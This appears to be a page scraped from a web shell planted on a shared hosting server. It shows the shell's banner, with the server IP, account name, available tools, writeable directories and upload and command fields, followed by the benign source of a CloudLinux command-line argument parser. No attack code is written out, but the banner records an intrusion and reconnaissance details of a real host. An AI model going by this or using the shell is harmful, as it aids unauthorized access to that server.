Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.148.57
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/lib/arg_parsers.py
# coding:utf-8

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2022 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

from typing import Tuple, Union

from docopt import DocoptExit, docopt
from schema import Schema, And, Use, Or, SchemaError

from clcommon.const import Feature
from clcommon.cpapi import is_panel_feature_supported

from .utils import VALUES_STR

PROG_NAME = "cloudlinux-limits"

# Limit names grouped by the kind of limit they belong to.
AVAILABLE_LVP_KEYS = {"speed", "nproc", "pmem", "maxEntryProcs", "io", "iops"}
# The LVE key set is the LVP key set plus "vmem".
AVAILABLE_LVE_KEYS = AVAILABLE_LVP_KEYS | {"vmem"}
AVAILABLE_QUOTA_KEYS = {"inodes"}
AVAILABLE_MYSQL_KEYS = {"mysql-cpu", "mysql-io"}

# Every limit name known to the utility, and the names accepted by --default.
AVAILABLE_KEYS = set().union(
    AVAILABLE_LVE_KEYS,
    AVAILABLE_QUOTA_KEYS,
    AVAILABLE_MYSQL_KEYS,
    AVAILABLE_LVP_KEYS,
)
AVAILABLE_DEFAULTS = AVAILABLE_KEYS | {"all"}

# Names accepted by --limits: the full set when the panel supports the LVE
# feature, otherwise only the quota keys and "cagefs".
AVAILABLE_LIMITS = (
    AVAILABLE_KEYS | {"mysql-gov", "mysql-restrict", "cagefs"}
    if is_panel_feature_supported(Feature.LVE)
    else AVAILABLE_QUOTA_KEYS | {"cagefs"}
)
AVAILABLE_MYSQL_KEYS_ALL = AVAILABLE_MYSQL_KEYS | {"mysql-gov", "mysql-restrict", "mysql-unrestrict-all"}

# Options that are rejected when combined with --for-reseller
# (see CloudlinuxLimitsOptsParser._is_option_compatible_with_admins).
ADMIN_ONLY_OPTIONS = [
    "--mysql-restrict",
    "--mysql-unrestrict-all",
    "--mysql-gov",
    "--mysql-io",
    "--mysql-cpu",
    "--cagefs",
    "--inodes",
]


def _default_keys_validate(keys):
    """
    Check the limit names passed to --default.

    :param keys: iterable of limit names
    :return: True when every name is in AVAILABLE_DEFAULTS, False otherwise
    """
    unknown_keys = set(keys) - AVAILABLE_DEFAULTS
    return not unknown_keys


def _limits_keys_validate(keys):
    """
    Check the comma-separated limit names passed to --limits.

    :param keys: string of limit names separated by commas
    :return: True when every name is in AVAILABLE_LIMITS, False otherwise
    """
    requested_keys = set(keys.split(","))
    return requested_keys.issubset(set(AVAILABLE_LIMITS))


# Uncomment this to add full edit mode
# gov_int_list = And(Use(lambda x:x.split(",")), lambda x:len(x) == 4,
#                    Use(lambda x:map(int, x)))

# Validation schema for the parsed arguments dictionary.
# Keys are the command and option names; values are the validators applied to
# the corresponding parsed value. Options that were not passed are expected to
# be None (valued options) or a bool (flags and commands).
global_schema = Schema({
    # Commands: plain boolean flags.
    "set": bool,
    "get": bool,
    "disable-reseller-limits": bool,
    "enable-reseller-limits": bool,
    # --json has to be truthy: any other output mode is rejected with the error below.
    "--json": And(bool, lambda x: x, error="use --json option, other modes currently unsupported"),
    "--human-readable-numbers": bool,
    "--unlimited": bool,
    # The comma-separated string is split into a list before the keys are checked.
    "--default": Or(None, And(Use(lambda x: x.split(',')), _default_keys_validate), error="Invalid keys"),
    "--save-all-parameters": bool,
    # Either a non-negative integer (converted with int) or the word "default"
    # in any letter case (converted to lower case).
    "--lve-id": Or(None, And(Use(int), lambda x: int(x) >= 0),
                   And(Use(lambda x: str(x).lower()),
                       lambda x: x == "default"),
                   error="--lve-id must be non-negative integer value or 'default'"),
    "--reseller-id": Or(None, And(Use(int), lambda x: int(x) >= 0),
                        error="--reseller-id must be non-negative integer value"),
    # Reseller names consisting only of digits are rejected.
    "--reseller-name": Or(None, And(str, lambda x: not x.isdigit()), error="Invalid reseller name"),
    "--all": bool,
    "--for-reseller": Or(None, And(str, lambda x: not x.isdigit()), error="Invalid reseller name"),
    "--username": Or(None, str),
    "--domain": Or(None, str),
    # The value stays a comma-separated string; only its keys are checked.
    "--limits": Or(None, _limits_keys_validate, error="Invalid keys"),
    # Options restricted to a fixed pair of allowed words.
    "--mysql-gov": Or(None, lambda x: x in ["ignored", "watched"],
                      error=f"{VALUES_STR}: 'ignored', 'watched'"),
    "--cagefs": Or(None, lambda x: x in ["enabled", "disabled"],
                   error=f"{VALUES_STR}: 'enabled', 'disabled'"),
    "--mysql-restrict": Or(None, lambda x: x in ["restricted", "unrestricted"],
                           error=f"{VALUES_STR}: 'restricted', 'unrestricted'"),
    "--mysql-unrestrict-all": bool,
    # These limit values are only required to be strings here; their content
    # is not checked by this schema.
    "--speed": Or(None, str),
    "--pmem": Or(None, str),
    "--vmem": Or(None, str),
    "--nproc": Or(None, str),
    "--io": Or(None, str),
    "--iops": Or(None, str),
    "--maxEntryProcs": Or(None, str),
    # MySQL governor limits: converted with int and required to be non-negative.
    "--mysql-cpu": Or(None, And(Use(int), lambda x: x >= 0),
                      error="--mysql-cpu must be non-negative integer value"),
    # Uncomment this to add full edit mode
    # "--mysql-io": Or(None, And(Use(int), lambda x:x >= 0), gov_int_list,
    "--mysql-io": Or(None, And(Use(int), lambda x: x >= 0),
                     error="--mysql-io must be non-negative integer value"),
    # Uncomment this to add full edit mode
    # "--mysql-read": Or(None, And(Use(int), lambda x:x >= 0), gov_int_list,
    #                    error="--mysql-read must be non-negative integer value or 4 int numbers with comma"),
    # "--mysql-write": Or(None, And(Use(int), lambda x:x >= 0), gov_int_list,
    #                     error="--mysql-write must be non-negative integer value or 4 int numbers with comma"),
    # Only required to be a string here (usage text describes it as <N,M>).
    "--inodes": Or(None, str),
    "--help": bool,
})

# Usage patterns without the program name; each entry becomes one line of the
# "Usage:" section of the docopt text.
USAGE_CMDS = (
    # set: make all limits unlimited for a user
    "set [--json] (--lve-id <int> | --username <str>) (--unlimited) [--for-reseller <str>]",

    # set: reset limits to defaults
    "set [--json] (--lve-id <int> | --username <str> | --reseller-name <str>) (--default <str>)",

    # set: MySQL governor / CageFS / dbctl restrict status
    "set [--json] (--lve-id <int> | --username <str>) "
    "(--mysql-gov <ignored,watched> | --cagefs <enabled,disabled> | --mysql-restrict <restricted,unrestricted>)",

    # set: unrestrict all users
    "set [--json] (--mysql-unrestrict-all)",

    # set: individual limits for a user
    "set [--json] (--lve-id <int> | --username <str>) "
    "[--speed <str> --io <str> --nproc <str> --pmem <str> --vmem <str> --iops <str> --inodes <N,M> "
    "--maxEntryProcs <str> --mysql-cpu <int> --mysql-io <int> --save-all-parameters]",

    # set: individual limits for a user or a reseller
    "set [--json] (--lve-id <int> | --username <str> | --reseller-name <str>) "
    "[--speed <str> --io <str> --nproc <str> --pmem <str> --vmem <str> --iops <str> --maxEntryProcs <str>] "
    "[--default <str>] [--for-reseller <str>]",

    # set: make all limits unlimited for a reseller
    "set [--json] (--reseller-name <str>) (--unlimited)",

    # get (the command word itself is optional)
    "[get] [--json] [--lve-id <int> | --username <str> | --reseller-name <str> | --domain <str>] "
    "[--limits=<keys>] [--human-readable-numbers] [--for-reseller <str>]",

    # reseller limits switches
    "disable-reseller-limits (--reseller-id <int> | --reseller-name <str>) [--json]",

    "enable-reseller-limits ((--reseller-id <int> | --reseller-name <str>) | --all) [--json]",

    # help
    "(-h | --help)",
)
# Prefix every pattern with the program name and put each on its own line,
# indented by four spaces to line up inside the "Usage:" section.
USAGE = "\n    ".join(PROG_NAME + " " + cmd for cmd in USAGE_CMDS).strip()


class CloudlinuxLimitsOptsParser:
    """
    Command line arguments parser for the cloudlinux-limits utility.

    ``docstring`` holds the usage text handed to docopt and ``commands`` lists
    the command words of the utility. ``parse_args`` is the entry point: it
    runs the pre-parsing checks, docopt, the post-parsing checks and finally
    validates the parsed arguments against the schema from ``_get_schema``.
    """
    docstring = f"""Utility to get/set any Cloudlinux limits

Usage:
    {USAGE}

Options:
    --json                              Return data in JSON format.
    --lve-id <int>                      LVE id. will display record only for that LVE id.
    --username <str>                    Execute command only for specific user.
    --reseller-name <str>               Execute command only for specific reseller.
    --reseller-id <int>                 Execute command only for specific reseller.
    --all                               Execute command for all resellers
    --for-reseller <str>                Use supplied reseller for get/set data.
    --domain <str>                      Show data only for specific domain
    --limits <keys>                     Available keys: speed,nproc,pmem,vmem,maxEntryProcs,io,
                                                        iops,mysql-gov,mysql-cpu,mysql-io,cagefs,inodes
    --human-readable-numbers            Return PMEM and VMEM limits in KBytes, MBytes or GBytes
    --unlimited                         Set all limits to unlimited.
    --default [limits]                  Reset limits to the Package defaults.
                                        List of comma-separated limits to reset them to default or "all"
    --mysql-gov <ignored|watched>       Monitor or ignore by MySQL governor.
    --cagefs <enabled|disabled>         Enable or disable CageFS for a user.
    --mysql-restrict <[un]restricted>   Set user restrict status with dbctl (restricted or unrestricted).
    --mysql-unrestrict-all              Unrestrict all restricted users with dbctl.
    --speed <str>                       Limit CPU usage for LVE | LVP.
    --pmem <str>                        Limit physical memory usage for applications inside LVE | LVP.
    --vmem <str>                        Limit virtual memory for applications inside LVE.
    --nproc <str>                       Limit number of processes for LVE | LVP.
    --io <str>                          Define io limits for LVE | LVP (KB/s).
    --iops <str>                        Limit io per second for LVE | LVP.
    --maxEntryProcs <str>               Limit number of entry processes for LVE | LVP.
    --mysql-cpu <int>                   Set MySQL governor CPU limit (pct).
    --mysql-io <int>                    Set MySQL governor IO limit (read + write MB/s)
    --inodes <N,M>                      Set inode limits. N - soft, M - hard.
    --save-all-parameters               Save all parameters even if they match with defaults settings.
    -h, --help                          Show this help message and exit
"""

    # Add these parameters to the docstring when the read/write/cpu full edit mode is needed.
    # This line is for the Usage block:
    # {0} set [--json] (--lve-id <int> | --username <str>) \
    #     [--speed <int> --io <int> --nproc <int> --pmem <int> --vmem <int> --iops <int> --inodes <N,M> \
    #     --maxEntryProcs <int> --mysql-cpu <int:int,int,int,int> --mysql-read <int:int,int,int,int> \
    #     --mysql-write <int:int,int,int,int> --mysql-io <int:int,int,int,int> --save-all-parameters]
    # These lines are for the Options block:
    # --mysql-cpu <int:int,int,int,int>    Set MySQL governor CPU limit (pct).
    # --mysql-io <int:int,int,int,int>     Set MySQL governor IO limit (read + write KB/s)
    # --mysql-read <int:int,int,int,int>   Set MySQL governor read limit (KB/s)
    # --mysql-write <int:int,int,int,int>  Set MySQL governor write limit (KB/s)

    # Command words; when none of them is set after parsing, `get` is assumed.
    commands = ("set", "get", "disable-reseller-limits", "enable-reseller-limits")

    @staticmethod
    def _is_option_compatible_with_admins(option: str, argv: list) -> Tuple[bool, str]:
        """
        Check that `option` is not used together with an admin-only option.

        Arguments are matched by prefix, so both the "--opt value" and the
        "--opt=value" forms are recognised.
        :param option: option name to look for, e.g. "--for-reseller"
        :param argv: raw command line arguments
        :return: Tuple (flag, message)
        flag: True/False - compatible/not compatible
        message - error text if flag is False, empty string otherwise
        """
        option_found = False
        admin_option_name = ""
        for arg in argv:
            if arg.startswith(option):
                option_found = True
                continue
            # only the first argument that matches an admin-only option is reported
            if not admin_option_name:
                for admin_option in ADMIN_ONLY_OPTIONS:
                    if arg.startswith(admin_option):
                        admin_option_name = admin_option
        if option_found and admin_option_name:
            # report the option that was actually checked rather than a hard-coded name
            return False, f"ERROR: option '{admin_option_name}' is not compatible with '{option}'"
        return True, ""

    def _perform_checks_before_docopt(self, argv: list) -> Tuple[bool, str]:
        """
        Perform checks on the raw arguments before they are parsed.

        :param argv: raw command line arguments
        :return: Tuple (ok, message); message is the error text when ok is False
        """
        return self._is_option_compatible_with_admins("--for-reseller", argv)

    def _perform_checks_after_docopt(self, args: dict) -> Tuple[bool, str]:
        """
        Perform checks on the arguments dictionary produced by docopt.

        :param args: parsed arguments
        :return: Tuple (ok, message); message is the error text when ok is False
        """
        # cloudlinux-limits set/get --json --reseller-name=reseller --for-reseller=reseller -- ERROR
        if args["--reseller-name"] and args["--for-reseller"]:
            return False, "ERROR: '--reseller-name' and '--for-reseller' cannot be used together"
        return True, ""

    def _apply_docopt(self, argv: list, is_json: bool) -> Tuple[dict, str]:
        """
        Parse the utility arguments with docopt, running the checks before and after parsing.

        :param argv: raw command line arguments
        :param is_json: when False, the usage text is appended to the parsing error message
        :return: Tuple (args, message); args is an empty dict and message holds
                 the error text when a check or the parsing itself fails
        """
        ok, message = self._perform_checks_before_docopt(argv)
        if not ok:
            return {}, message
        try:
            args = docopt(self.docstring, argv)
        except DocoptExit:
            s_error_string = "ERROR: Invalid parameter passed or required parameter is missing"
            if not is_json:
                s_error_string += "\n\n" + self.docstring
            return {}, s_error_string

        ok, message = self._perform_checks_after_docopt(args)
        if not ok:
            return {}, message
        return args, ""

    @staticmethod
    def _get_schema() -> Schema:
        """
        Return the schema that should be used to validate parsed arguments.
        """
        return global_schema

    @staticmethod
    def _validate_schema(schema: Schema, args: dict) -> Tuple[dict, str]:
        """
        Validate parsed arguments with the provided schema.

        :param schema: schema to validate against
        :param args: parsed arguments
        :return: Tuple (args, message); args is the validated dictionary and
                 message is empty on success, otherwise args is an empty dict
                 and message is the text of the SchemaError
        """
        try:
            args = schema.validate(args)
        except SchemaError as e:
            return {}, str(e)
        return args, ""

    def parse_args(self, argv: list, is_json: bool = False) -> Tuple[bool, Union[str, dict]]:
        """
        Parse and validate the arguments passed to the utility.

        :param argv: raw command line arguments
        :param is_json: passed on to the docopt step, where it controls whether
                        the usage text is appended to a parsing error
        :return: Tuple (True, validated arguments) on success or
                 (False, error message) on failure
        """
        args, message = self._apply_docopt(argv, is_json)
        if not args:
            return False, message
        # if command was not specified, use `get` command
        if not any(args.get(command) for command in self.commands):
            args["get"] = True

        schema = self._get_schema()
        args, message = self._validate_schema(schema, args)
        if not args:
            return False, message
        return True, args


class CloudlinuxLimitsNoLveOptsParser(CloudlinuxLimitsOptsParser):
    """
    Parser variant with a reduced usage text, command list and schema.

    NOTE(review): judging by the name this is meant for systems without LVE
    support; where the parser class is chosen is not visible in this file.
    """
    docstring = f"""Utility to get/set any Cloudlinux limits

Usage:
    {PROG_NAME} set [--json] (--lve-id <int> | --username <str>) (--cagefs <enabled,disabled>)
    {PROG_NAME} set [--json] (--lve-id <int> | --username <str>) (--unlimited)
    {PROG_NAME} set [--json] (--lve-id <int> | --username <str>) (--default <str>)
    {PROG_NAME} set [--json] (--lve-id <int> | --username <str>) [--inodes <N,M> --save-all-parameters]
    {PROG_NAME} [get] [--json] [--lve-id <int> | --username <str> | --domain <str>] [--limits=<keys>]
    {PROG_NAME} (-h | --help)

Options:
    --json                              Return data in JSON format.
    --lve-id <int>                      LVE id. will display record only for that LVE id.
    --username <str>                    Execute command only for specific user.
    --cagefs <enabled|disabled>         Enable or disable CageFS for a user.
    --unlimited                         Set supported limits to unlimited.
    --default [limits]                  Reset supported limits to the Package defaults.
                                        List of comma-separated limits to reset them to default or "all"
    --domain <str>                      Show data only for specific domain
    --limits <keys>                     Available keys: inodes
    --inodes <N,M>                      Set inode limits. N - soft, M - hard.
    --save-all-parameters               Save all parameters even if they match with defaults settings.
    -h, --help                          Show this help message and exit
"""

    commands = ("set", "get")

    def _perform_checks_before_docopt(self, argv: list) -> Tuple[bool, str]:
        """
        Nothing to check before parsing for this parser; always succeeds.
        """
        return True, ""

    def _perform_checks_after_docopt(self, args: dict) -> Tuple[bool, str]:
        """
        Nothing to check after parsing for this parser; always succeeds.
        """
        return True, ""

    @staticmethod
    def _get_schema() -> Schema:
        """
        Build a schema restricted to the options present in this parser's usage text.
        """
        supported = {
            "set", "get",
            "--json", "--lve-id", "--username", "--cagefs", "--domain",
            "--unlimited", "--default", "--limits", "--inodes",
            "--save-all-parameters", "--help",
        }
        full_schema = global_schema.schema
        # keep the validators of the global schema, dropping the unsupported options
        return Schema({name: full_schema[name] for name in full_schema if name in supported})

    def parse_args(self, argv: list, is_json: bool = False) -> Tuple[bool, Union[str, dict]]:
        """
        Parse the arguments and pad the result with every option of the global schema.

        Options missing from the parsed dictionary are added with a negative
        value (False for boolean options, None for the rest), because the
        utility may look them up.
        :return: Tuple (True, arguments) on success or (False, error message) on failure
        """
        succeeded, parsed = super().parse_args(argv, is_json)
        if succeeded:
            for name, validator in global_schema.schema.items():
                if name not in parsed:
                    parsed[name] = False if validator is bool else None
        return succeeded, parsed

Youez - 2016 - github.com/yon3zu
LinuXploit